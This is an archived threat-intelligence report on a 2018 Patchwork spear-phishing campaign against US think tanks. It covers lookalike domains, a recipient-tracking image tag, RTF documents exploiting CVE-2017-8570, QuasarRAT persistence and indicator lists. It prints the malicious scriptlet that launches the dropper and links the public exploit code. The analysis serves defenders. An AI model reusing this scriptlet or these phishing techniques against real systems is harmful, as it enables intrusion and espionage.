{
	"id": "ddaade60-cee6-443f-a787-e5ef6ca72c62",
	"created_at": "2026-04-06T00:15:51.848154Z",
	"updated_at": "2026-04-10T03:33:54.593839Z",
	"deleted_at": null,
	"sha1_hash": "4b7cd07ad68ff8bde356ee84ea22b0e918899684",
	"title": "Patchwork APT Group Targets US Think Tanks",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 3079547,
	"plain_text": "Patchwork APT Group Targets US Think Tanks\r\nBy mindgrub\r\nPublished: 2018-06-07 · Archived: 2026-04-05 15:08:05 UTC\r\nIn March and April 2018, Volexity identified multiple spear phishing campaigns attributed to Patchwork, an Indian\r\nAPT group also known as Dropping Elephant. This increase in threat activity was consistent with other\r\nobservations documented over the last few months in blogs by 360 Threat Intelligence Center analyzing attacks on\r\nChinese organizations and Trend Micro noting targets in South Asia. From the attacks observed by Volexity, what\r\nis most notable is that Patchwork has pivoted its targeting and has launched attacks directly against US-based\r\nthink tanks. Volexity has also found that, in addition to sending malware lures, the Patchwork threat actors are\r\nleveraging unique tracking links in their e-mails for the purpose of identifying which recipients opened their e-mail messages.\r\nIn three observed spear phishing campaigns, the threat actors leveraged domains and themes mimicking those of\r\nwell-known think tank organizations in the United States. The group lifted articles and themes from the Council\r\non Foreign Relations (CFR), the Center for Strategic and International Studies (CSIS), and the Mercator Institute\r\nfor China Studies (MERICS) for use in their spear phishing lures and malicious Rich Text Format (RTF)\r\ndocuments. Strangely, in one case, the threat actors also appear to have used a domain name similar to the Foreign\r\nPolicy Research Institute (FPRI) in a message purporting to be from CFR. Each of the spear phishing attacks\r\ncontained links to .doc files, which were really RTF documents that attempt to exploit CVE-2017-8570\r\n(Composite Moniker). 
The threat actors appear to have leveraged publicly available exploit code that can be found\r\nhttps://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/\r\nPage 1 of 11\n\non Github at the URL: https://github.com/rxwx/CVE-2017-8570. If the exploit is successful, the threat actors will\nattempt to drop and execute QuasarRAT. Details of the malware and the associated attacks are listed below.\nSpear Phishing Messages\nEach e-mail was sent from the attacker-controlled domain mailcenter.support. This domain was not only used to\nsend the phishing e-mails, but also to track which targets opened the e-mail. Within each of the HTML-formatted\nmessages, an embedded image tag is used to beacon home to the attacker’s domain, containing a unique\nidentifier specific to the recipient.\n\u003cimg src=3D\"hxxps://www.mailcenter.support/track/\u003cunique_32_byte_identifier\u003e\" width=3D\"0\" height=3D\"0\" /\u003e\nWhile the use of e-mail recipient tracking, a linked RTF document, and a final payload (QuasarRAT variant)\nremained the same, certain elements differed across campaigns observed. 
Details on each of the messages are\nlisted below.\nMessage 1:\nHeaders Received: by mailcenter.support\nSender China Policy Analysis\nSubject Chinas Arctic Dream\nBody\nContent and images included within the e-mail body were a direct copy of the following CSIS\narticle:\nhttps://www.csis.org/analysis/chinas-arctic-dream\nNotes\nThe hyperlinked text Download File of “China’s Arctic Dream” within the e-mail body led to\na malicious RTF document located at the URL\nhxxp://chinapolicyanalysis.org/Chinas_Arctic_Dream.doc.\nThe chinapolicyanalysis.org domain was used as the sender address, as well as the hosting\nlocation of the malicious RTF document.\nMessage 2:\nHeaders Received: by mailcenter.support\nSender Council on Foreign Relations\nSubject The Four Traps China May Fall Into\nBody\r\nContent and images included within the e-mail body were a direct copy of the following CFR\r\narticle:\r\nhttps://www.cfr.org/blog/four-traps-china-may-fall\r\nNotes\r\nMultiple hyperlinks within the e-mail body led to a malicious RTF document located at the URL\r\nhxxp://fprii.net/The_Four_Traps_for_China.doc.\r\nThe fprii.net domain was used as the sender address, as well as the hosting location of the\r\nmalicious RTF document. 
The structure of the domain mimics the Foreign Policy Research\r\nInstitute (FPRI), whose actual domain is fpri.net.\r\nMessage 3:\r\nHeaders Received: by mailcenter.support\r\nSender Mercator Institute for China Studies \u003cpublications@mericcs.org\u003e\r\nSubject Authoritarian advance Responding to Chinas growing political influence in Europe\r\nBody\r\nContent and images included within the e-mail body were a direct copy of the following MERICS\r\nreport:\r\nhttps://www.merics.org/sites/default/files/2018-02/GPPi_MERICS_Authoritarian_Advance_2018_1.pdf\r\nNotes\r\nThe hyperlinked text Click here to download the report within the e-mail body led to a\r\nmalicious RTF document located at the URL\r\nhxxp://www.mericcs.org/GPPi_MERICS_Authoritarian_Advance_2018_1Q.doc.\r\nThe mericcs.org domain was used as the sender address, as well as the hosting location of the\r\nmalicious RTF document. The structure of the domain mimics the Mercator Institute for China\r\nStudies (MERICS), whose actual domain is merics.org.\r\nSample Message\r\nThe image below shows an example of how the spear phishing message would look to a recipient.\r\nExploitation and Malware Execution\r\nUpon opening the above attachments, the recipient will be presented with a document that is a direct copy of a\r\nblog post or report released by the think tank organization being impersonated. At first glance, everything might\r\nlook legitimate, but in the background the target user has likely just been infected with QuasarRAT. QuasarRAT is\r\na freely available “remote (administration|access) tool” (RAT) written in C# and distributed via Github. This RAT\r\nprovides a variety of functionality that makes it particularly attractive to an attacker. 
This includes, but is not\r\nlimited to, the following:\r\nAES encryption of network communication\r\nFile management\r\nFunctionality to download, upload, and execute files\r\nKeylogging\r\nRemote desktop access\r\nRemote webcam viewing\r\nReverse proxy\r\nBrowser and FTP client password recovery\r\nThe images below are what a target user opening a malicious RTF document would see from within Microsoft\r\nWord.\r\nWhen the malicious RTF document is opened, two things happen that allow the attacker’s malware to run. First, the\r\n“packager trick” is leveraged in order to embed the initial QuasarRAT dropper (qrat.exe) in the malicious RTF\r\ndocument. It’s called the “packager trick” because any file embedded in an RTF file using packager will be\r\nautomatically dropped to the %tmp% folder (c:\\Users\\%username%\\AppData\\Local\\Temp) when the RTF\r\ndocument is opened. Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious\r\n“scriptlet” file, or .sct file, which is also embedded in the malicious RTF document. The contents of the malicious\r\nscriptlet file (displayed below) clearly show the threat actor executing the initial “qrat.exe” dropper from the\r\ncurrent user’s %tmp% directory.\r\nNote: The scriptlet code is an exact match to that shown on the Github page referenced earlier for CVE-2017-8570. 
The string “fjzmpcjvqp” is unique and not something likely to be present if the code was not generated with\r\nthe same public POC exploit code.\r\n\u003c?XML version=\"1.0\"?\u003e\r\n\u003cscriptlet\u003e\r\n\u003cregistration description=\"fjzmpcjvqp\"\r\nprogid=\"fjzmpcjvqp\"\r\nversion=\"1.00\"\r\nclassid=\"{204774CF-D251-4F02-855B-2BE70585184B}\"\r\nremotable=\"true\" \u003e\r\n\u003c/registration\u003e\r\n\u003cscript language=\"JScript\"\u003e\r\n\u003c![CDATA[\r\nvar r = new ActiveXObject(\"WScript.Shell\").Run(\"cmd /c %tmp%\\qrat.exe\",0,false);\r\nexit();\r\n]]\u003e\r\n\u003c/script\u003e\r\n\u003c/scriptlet\u003e\r\nAfter the initial dropper (qrat.exe) has been executed by the embedded scriptlet, it creates a directory in\r\nC:\\Users\\%username%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0 and\r\nunpacks/drops the final QuasarRAT binary named microsoft_network.exe.\r\nThe malware also contains an embedded .NET wrapper DLL for creating and managing scheduled tasks on\r\nWindows systems. The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from\r\nAirVPN.\r\nThis DLL is used to create a scheduled task that points to the QuasarRAT binary, microsoft_network.exe,\r\nallowing it to remain persistent after reboot.\r\nAs seen in the image above, the QuasarRAT scheduled task is named Microsoft_Security_Task and runs at 12:00\r\nAM each day. Once the task is triggered, it will then repeat every 5 minutes for 60 days. When executed,\r\nmicrosoft_network.exe will initiate a request to freegeoip.net in order to determine the geographical location of\r\nthe infected host. 
Immediately following the request, the malware will begin to beacon over an encrypted\r\nconnection to the threat actor’s command and control domain tautiaos.com (43.249.37.199). Several related\r\nsamples were identified and are included in the File Indicators section below.\r\nConclusion\r\nThe addition of US-based think tanks to the list of organizations in the crosshairs of Patchwork shows an\r\nincreasing diversity in the geographic regions being targeted. While there were a few peculiar components to some\r\nof the spear phish messages, the campaigns and themes were strategically relevant to the organizations being\r\ntargeted. The Patchwork threat actors also appear to have adopted a technique seen from other APT groups where\r\nthey are now tracking the effectiveness of their campaigns by recording which recipients have opened the phishing\r\nmessage. This information allows a threat actor to determine if their messages were delivered, which users are\r\nmore susceptible to opening them, and basic information regarding the target’s operating system and e-mail client\r\n(or browser). Finally, although the payload observed being delivered by Patchwork in these campaigns is a readily\r\navailable open source RAT, it does allow for flexibility in interacting with compromised machines without\r\nneeding to use custom malware. 
Volexity is actively tracking this group and the infrastructure currently in use for\r\nthe benefit of its network security monitoring and threat intelligence customers.\r\nFile Indicators\r\nSamples Observed from Spear Phishing Messages Above\r\nFilename Chinas_Arctic_Dream.doc\r\nFile Size 6587812 bytes\r\nMD5 598eeb6a18233023f3551097aa49b083\r\nSHA1 e9a46966f93fe15c22636a5033c61c725add8fa5\r\nNotes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.\r\nFilename The_Four_Traps_for_China.doc\r\nFile Size 4428595 bytes\r\nMD5 7659c41a30976d523bb0fbb8cde49094\r\nSHA1 3f1f3e838a307aff52fbcb5bba5e4c8fe68c30e5\r\nNotes Malicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe.\r\nFilename qrat.exe\r\nFile Size 1093120 bytes\r\nMD5 c05e5131b196f43e1d02ca5ccc48ec0e\r\nSHA1 f28c592833f234c619917b5c7d8974840a810247\r\nNotes\r\nDropper that installs QuasarRAT file microsoft_network.exe and scheduled task wrapper file\r\nMicrosoft.Win32.TaskScheduler.dll.\r\nFilename microsoft_network.exe\r\nFile Size 846336 bytes\r\nMD5 9e4c373003c6d8f6597f96fc3ff1f49c\r\nSHA1 b7319a5ccf605fb2ff7760130e212728bccad323\r\nNotes\r\nQuasarRAT file that beacons to hardcoded IP 43.249.37.199 and the domain tautiaos.com. 
File is\r\ndropped to\r\nC:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft Network\\microsoft_network\\1.0.0.0\\microsoft_network.exe.\r\nFilename Microsoft.Win32.TaskScheduler.dll\r\nFile Size 204488 bytes\r\nMD5 6fa7fce844065ce9c605cbe713f3e170\r\nSHA1 2f7eaad80eab3e9dcc67a003968b35c227290c69\r\nNotes\r\n.NET Task Scheduler Managed Wrapper from https://github.com/dahall/taskschedule. The DLL\r\nis also digitally signed by a certificate from “AirVPN”.\r\nAdditional Observed Malware Files\r\nFilename Armed-Forces-Officers.doc\r\nFile Size 3226435 bytes\r\nMD5 89beb207e7095d237c4d25c4c6e17e97\r\nSHA1 15010f7cea913f2a36c56da7d73c2b9eb5a3878f\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops a Delphi RAT with the file\r\nname vsrss.exe.\r\nFilename Part-I.doc\r\nFile Size 11349102 bytes\r\nMD5 92942c54224cd462dd201ae11a560bb8\r\nSHA1 85a21624df2211af3daf05c86a3fbea8271059d3\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file qrat.exe. This\r\nis the same file described above.\r\nFilename Part-II.doc\r\nFile Size 10156713 bytes\r\nMD5 e32668e569362c96cc56db368b7e821e\r\nSHA1 dadc493abbe3e21610539e1d5a42f523626a6132\r\nNotes\r\nMalicious RTF document that exploits CVE-2017-8570 and drops QuasarRAT file mico-audio.exe. 
Upon execution it will be installed under the filename crome.exe.\r\nFilename vsrss.exe\r\nFile Size 446976 bytes\r\nMD5 5c3456d5932544b779fe814133344fdb\r\nSHA1 7ab750afb25457a81c27a98dc6dfd51c27e61b0e\r\nNotes Delphi RAT file that beacons to ebeijingcn.live.\r\nFilename mico-audio.exe, crome.exe\r\nFile Size 494592 bytes\r\nMD5 2d8e9fb75e6e816cad38189691e9c9c8\r\nSHA1 2b9a2d5b34b4d79fdfd6c7b861311b12d1627163\r\nNotes\r\nQuasarRAT binary that beacons to hardcoded IP 209.58.176.201 and domain sastind-cn.org. File\r\nstarts as mico-audio.exe and installs to C:\\Users\\%USERNAME%\\AppData\\Roaming\\google-chrome\\crome.exe.\r\nNetwork Indicators\r\nHostname IP Address Notes\r\nmailcenter.support 221.121.138.139 Domain used for sending spear phishes and user tracking.\r\nchinapolicyanalysis.org 185.130.212.168 Domain used for spear phish sender e-mail address and to host malicious documents.\r\nfprii.net 185.130.212.254 Domain used for spear phish sender e-mail address and to host malicious documents.\r\nmericcs.org 221.121.138.141 Domain used for spear phish sender e-mail address and to host malicious documents.\r\ntautiaos.com 43.249.37.199 Command and control server observed from QuasarRAT malware.\r\nsastind-cn.org 209.58.176.201 Command and control server observed from QuasarRAT malware.\r\nebeijingcn.live 209.58.169.91 Command and control server observed from Delphi RAT malware.\r\nSource: https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia",
		"MISPGALAXY",
		"MITRE"
	],
	"references": [
		"https://www.volexity.com/blog/2018/06/07/patchwork-apt-group-targets-us-think-tanks/"
	],
	"report_names": [
		"patchwork-apt-group-targets-us-think-tanks"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7ea1e0de-53b9-4059-802f-485884180701",
			"created_at": "2022-10-25T16:07:24.04846Z",
			"updated_at": "2026-04-10T02:00:04.84985Z",
			"deleted_at": null,
			"main_name": "Patchwork",
			"aliases": [
				"APT-C-09",
				"ATK 11",
				"Capricorn Organisation",
				"Chinastrats",
				"Dropping Elephant",
				"G0040",
				"Maha Grass",
				"Quilted Tiger",
				"TG-4410",
				"Thirsty Gemini",
				"Zinc Emerson"
			],
			"source_name": "ETDA:Patchwork",
			"tools": [
				"AndroRAT",
				"Artra Downloader",
				"ArtraDownloader",
				"AutoIt backdoor",
				"BADNEWS",
				"BIRDDOG",
				"Bahamut",
				"Bozok",
				"Bozok RAT",
				"Brute Ratel",
				"Brute Ratel C4",
				"CinaRAT",
				"Crypta",
				"ForeIT",
				"JakyllHyde",
				"Loki",
				"Loki.Rat",
				"LokiBot",
				"LokiPWS",
				"NDiskMonitor",
				"Nadrac",
				"PGoShell",
				"PowerSploit",
				"PubFantacy",
				"Quasar RAT",
				"QuasarRAT",
				"Ragnatela",
				"Ragnatela RAT",
				"SocksBot",
				"TINYTYPHON",
				"Unknown Logger",
				"WSCSPL",
				"Yggdrasil"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c81067e0-9dcb-4e3f-abb0-80126519c5b6",
			"created_at": "2022-10-25T15:50:23.285448Z",
			"updated_at": "2026-04-10T02:00:05.282202Z",
			"deleted_at": null,
			"main_name": "Patchwork",
			"aliases": [
				"Hangover Group",
				"Dropping Elephant",
				"Chinastrats",
				"Operation Hangover"
			],
			"source_name": "MITRE:Patchwork",
			"tools": [
				"NDiskMonitor",
				"QuasarRAT",
				"BackConfig",
				"TINYTYPHON",
				"AutoIt backdoor",
				"PowerSploit",
				"BADNEWS",
				"Unknown Logger"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2b29dd16-a06f-4830-81a1-365443bc54b8",
			"created_at": "2023-01-06T13:46:38.460047Z",
			"updated_at": "2026-04-10T02:00:02.983931Z",
			"deleted_at": null,
			"main_name": "QUILTED TIGER",
			"aliases": [
				"Chinastrats",
				"Sarit",
				"APT-C-09",
				"ZINC EMERSON",
				"ATK11",
				"G0040",
				"Orange Athos",
				"Thirsty Gemini",
				"Dropping Elephant"
			],
			"source_name": "MISPGALAXY:QUILTED TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434551,
	"ts_updated_at": 1775792034,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.pdf",
		"text": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.txt",
		"img": "https://archive.orkl.eu/4b7cd07ad68ff8bde356ee84ea22b0e918899684.jpg"
	}
}